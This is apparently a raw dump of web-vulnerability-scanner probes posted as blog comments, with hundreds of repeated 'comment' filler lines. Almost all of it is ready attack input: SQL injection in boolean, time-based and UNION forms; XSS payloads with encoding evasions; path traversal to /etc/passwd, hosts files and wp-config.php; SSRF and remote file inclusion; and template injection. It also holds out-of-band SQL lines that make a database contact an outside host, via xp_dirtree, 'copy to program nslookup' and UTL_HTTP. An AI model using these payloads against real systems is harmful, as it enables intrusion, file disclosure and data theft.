comment’ AND 1=1 LIMIT 1–
REPEAT(0x636f6d6d656e74,2)
REPEAT(0x636f6d6d656e74,1)
comment OR 1=1
comment OR 1=0
comment’ OR ‘1’=’1
comment’ OR ‘1’=’0
comment” OR “1”=”1
comment” OR “1”=”0
comment’) OR (‘1’=’1
comment’) OR (‘1’=’0
comment”) OR (“1″=”1
comment”) OR (“1″=”0
comment’ OR 1=1 ##
comment’ OR 1=0 ##
comment’ OR 1=1 —
comment’ OR 1=0 —
comment’ OR ‘1’=’0
comment’ OR ‘1’=’1
comment” OR “1”=”0
comment” OR “1”=”1
comment’) OR (‘1’=’0
comment’) OR (‘1’=’1
comment”) OR (“1″=”0
comment”) OR (“1″=”1
comment’ OR 1=0 ##
comment’ OR 1=1 ##
comment’ OR 1=0 —
comment’ OR 1=1 —
comment’) AND ‘1’ in (‘0
comment’) AND ‘1’ in (‘1
comment”) AND “1” in (“0
comment”) AND “1” in (“1
comment’) OR ‘1’ in (‘0
comment’) OR ‘1’ in (‘1
comment”) OR “1” in (“0
comment”) OR “1” in (“1
comment DESC
comment ASC
1, comment DESC
1, comment ASC
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(2784810,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(13924050,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(34969075,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment and 1 in (select BENCHMARK(34969075,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’)) ) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(1,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(200000,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(327380,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(404172,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(444589,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select BENCHMARK(489047,AES_DECRYPT(AES_ENCRYPT(‘EncryptedString’,’EncryptionKey’),’EncryptionKey’))) —
comment’ and 1 in (select*from(select(sleep(05)))a) —
comment’);WAITFOR DELAY ’00:00:05′–
comment’ OR 1=1 —
comment’ OR 1=0 —
comment AND pg_sleep(00) is not null
comment AND pg_sleep(05) is not null
comment ‘;select pg_sleep(00);– –
comment ‘;select pg_sleep(05);– –
comment ;select pg_sleep(00);– –
comment ;select pg_sleep(05);– –
‘.phpinfo().’
x75vmzwf
x76nqctb
x77lfzi0: x77lfzi0
=alert(1998390)
=alert(2190930)
=alert(2403960)
=alert(2584210)
comment
comment
‘alert(3157768)
‘alert(3333931)
‘alert(3555173)
‘alert(3760063)
abc
abc
abc
abc
abc
abc
abc
abc
comment”>
comment”>
comment”>
comment”>
abc
abc
abc
abc
@import’x7z3sa7r’;
@import’x70w4md7′;
@import’x71yk3ow’;
@import’x72rxeuw’;
ADw-script AD4-alert(9410659) ADw-/script AD4-
ADw-script AD4-alert(9640103) ADw-/script AD4-
+ADw-script+AD4-alert(9832756)+ADw-/script+AD4-
+ADw-script+AD4-alert(10070526)+ADw-/script+AD4-
abc
abc
abc
abc
comment’>
comment’>
comment’>
comment’>
alert`12644499`
alert`12800222`
alert`12980573`
alert`13181433`
prompt`13349477`
prompt`13546230`
prompt`13718351`
prompt`13923232`
top[‘al’ ‘ert’](14107644)
top[‘al’ ‘ert’](14300236)
top[‘al’+’ert’](14492873)
top[‘al’+’ert’](14661002)
aler\u0074(14865939);
aler\u0074(15038092);
aler\u0074(15214339);
aler\u0074(15374168);
MOUSEOVER ME
MOUSEOVER ME
MOUSEOVER ME
MOUSEOVER ME
c
c
c
c
\”http://example.com/ ‘ onmouseover=alert(839108) ‘
\”http://example.com/ ‘ onmouseover=alert(1011308) ‘
\”http://example.com/ ‘ onmouseover=alert(1195800) ‘
\”http://example.com/ ‘ onmouseover=alert(1359773) ‘
alert(1536079)
alert(1700047)
alert(1880354)
alert(2064789)
“><img src=x onerror="alert(2265656)
“><img src=x onerror="alert(2503420)
“><img src=x onerror="alert(2741150)
“><img src=x onerror="alert(2991180)
‘comment
comment’
comment”
comment’
comment
‘comment
comment’
comment”
comment’
comment%’
comment
comment%u0027
comment%27
comment%”
comment
comment%u0022
1e309
%u2019comment
%u201bcomment
%u201ccomment
%u201dcomment
%u201ecomment
— comment
/*comment
commentʼ
comment’ UNION ALL select NULL —
comment” UNION ALL select NULL —
SELECT * FROM “master”
SELECC * FROM “ds”
http://appspidered.rapid7.com/xss/script/aa5192f18f13f02e0d1ebb689ee71a15304a0459
http://appspidered.rapid7.com/xss/script/d79db400dfa83c3ca8e3055c57706fcb01cd144b
http://appspidered.rapid7.com/xss/script/45e2b4646bc85808cd357f4a71f3dbc48d622e2c
http://appspidered.rapid7.com/xss/script/21b563847795bfcf50cf81ca989bcfba04e6791c
https://appspidered.rapid7.com/xss/script/268b90a85b274e477ec1e268229e8d9edd88c273
https://appspidered.rapid7.com/xss/script/9a9c43aa9e710dafc35ff16bbf259ce26ef9c15b
https://appspidered.rapid7.com/xss/script/2a8c85f344887173c0da320a5a2d66df4ba168a8
https://appspidered.rapid7.com/xss/script/987fe92b6c787376152af7615855db6000ff64e8
http://appspidered.rapid7.com/xss/script/ca50593e8e3ac3e08bc90541b05d6c1aeea43c38
http://appspidered.rapid7.com/xss/script/53230913b10d146816b42231709babc23fda2f32
http://appspidered.rapid7.com/xss/script/05167356f3409fa7c2deca4b8a2ce560dd987bca
http://appspidered.rapid7.com/xss/script/e951be55a46a609c94d2dd854535afe6b42c1a21
https://appspidered.rapid7.com/xss/script/aed07a4f097e1cfbb41682dd6bc04440e7cbcbd9
https://appspidered.rapid7.com/xss/script/acbce1172afadea8fcfd3475b5b69628d4308840
https://appspidered.rapid7.com/xss/script/f6ae835e27d7543a8923ca0b32ba0d4da9c9ebf0
https://appspidered.rapid7.com/xss/script/73c979b3491a9bfb006b1b9f940539ed10b52fa6
appspidered.rapid7.com/xss/script/7468f6622e47601344f2ffc5516140f04f0aad02
appspidered.rapid7.com/xss/script/c8870b2a56e6654bf04ca22f0bfbbda5b83081e0
appspidered.rapid7.com/xss/script/24d9759c374f58add28b7160288f446e5ace1938
appspidered.rapid7.com/xss/script/ad253455db8b2d68c6016b38beef3b26f724e621
comment’;+exec+master..xp_dirtree+”//568f754149069c3e186000571f7119b50800b4e1.oob.appspidered.rapid7.com/a”–
comment’;+SELECT+*+FROM+OPENROWSET(‘SQLOLEDB’,+’094e66c7d2e8c10ef3eee58a5a372c70730567ee.oob.appspidered.rapid7.com’;’sa’;’pwd’,+’SELECT+1′)–
comment’;+SELECT+LOAD_FILE(‘\\\\2a98e674e8224358ca87a03dac3bebe0578c7ec4.oob.appspidered.rapid7.com\\a’)#
comment’;+SELECT+’hello’+INTO+DUMPFILE+’\\\\fff43e879cd56facf444dcb1d141fc88bc108c87.oob.appspidered.rapid7.com\\a’#
comment’;+copy+(SELECT+”)+to+program+’nslookup+b9af6b7ef2c640fa55794be51ca19f9483b7a9ac.oob.appspidered.rapid7.com’–
comment’+ORDER+BY+(CASE+WHEN+(1=0)+THEN+NULL+ELSE+UTL_HTTP.REQUEST(‘http://dbf216a294dea09dbd2e865034fa5643aedb93b9.oob.appspidered.rapid7.com/’)+END)–
wp-comments-post.php
/etc/passwd
\WINDOWS\system32\drivers\etc\hosts
C:\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts
..\..\..\..\..\..\WINDOWS\system32\drivers\etc\hosts.htm
wp-comments-post.php
/wp-comments-post.php
../../../../../../../../../../etc/hosts
< /etc/passwd
/.
\.
c:\.
http://appspidered.rapid7.com/
http://appspidered.rapid7.com/
appspidered.rapid7.com/
wp-comments-post.php.
../wp-comments-post.php.
../../wp-comments-post.php.
c:\boot.ini.
c:\boot.ini
d:\boot.ini
../../../../../../../../../../etc/hosts.
/etc/passwd
file:/etc/passwd
file:/wp-comments-post.php
/WEB-INF/web.xml
WEB-INF/web.xml
file:WEB-INF/web.xml
/../../WEB-INF/web.xml
\WEB-INF\web.xml
/../../../../../../../../../../.
noexistnoexist
/.
/.
http://localhost/
http://localhost:22/
package.json.bak
package.json.bak
package.json.bak%00
../wp-config.php
http://appspidered.rapid7.com/rfi/x7fawt6y
/../../../../../../../../../../vendor.js
../../../../../
..\..\..\..\..\
commentcommentcomment
655321
./*][
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
${applicationScope}
${requestScope}
${“asdflkj”.toString().replace(“d”,”x”)}
#{“asdflkj”.toString().replace(“d”,”x”)}
{{ 58719 * 21973 }}
{{ 62951705 + 74179523 }}
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment
comment